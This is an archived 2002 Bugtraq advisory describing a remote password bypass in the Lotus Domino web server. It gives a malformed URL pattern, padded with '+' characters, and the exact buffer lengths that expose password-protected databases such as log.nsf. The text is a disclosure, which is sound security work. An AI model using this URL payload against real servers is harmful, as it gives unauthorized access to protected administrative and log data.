[24089] in bugtraq

home help back first fref pref prev next nref lref last post

Lotus Domino password bypass

daemon@ATHENA.MIT.EDU (Gabriel A. Maggiotti)
Mon Feb 4 14:48:27 2002

Message-ID: <3C5E072D.29FA57FB@ciudad.com.ar>
Date: Mon, 04 Feb 2002 00:59:41 -0300
From: "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar>
Reply-To: gmaggiot@ciudad.com.ar
MIME-Version: 1.0
To: vuln-dev@securityfocus.com, bugtraq@securityfocus.com
Content-Type: multipart/mixed;
 boundary="------------675FE29B88FEEE20DBD89AA3"

--------------675FE29B88FEEE20DBD89AA3
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit



--------------675FE29B88FEEE20DBD89AA3
Content-Type: text/plain; charset=us-ascii;
 name="research.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="research.txt"

---------------------------------------------------------------------------
Web:  http://qb0x.net 			Author: Gabriel A. Maggiotti
Date: Febrary 03, 2002			E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------


General Info
------------
Problem Type	:  password protected url bypass
Product		:  Lotus Domino
Scope		:  Remote
Risk		:  High


Summary
-------
A security vulnerability has been found in the popular Lotus Domino Web server.
Lotus Domino have files like webadmin.nsf, log.nsf and names.nfs,  this   files 
are protected by password.  I discover that is posible to bypass this  password 
if you create a malformed url.

Notes Databases '.nsf' like webadmin.nsf or log.nsf are store in "lotus/domino/
data/" directory nas Notes Templatesi '.ntf' are store in the same  place (Here
is the goal).


Examples:

I found a critical and max length.

assuming the buffer is:		http://host.com/<buffer>/

Critical buffer length: is the minimun buffer   length you need  to  bypass the 
passwd file.

normal url:	http://host.com/log.nsf	<----	Request for a passwd
modify url:	http://host.com/log.ntf<buff>.snf/
				|-----217 -------|

In the case of log.nsf, <buff> is 217 - 12 = 205 '+' and the url will be:

http://host.com/log.ntf++++++++++++++++++++.nsf/
		       |-------- 205 -----|   


If you write a buffer between 219 and 257(higher buffer), you bypass the passwd.
modify url:     http://host.com/log.ntf<buff>.snf/
                                |---219 to 257 --|


--------------675FE29B88FEEE20DBD89AA3--
home help back first fref pref prev next nref lref last post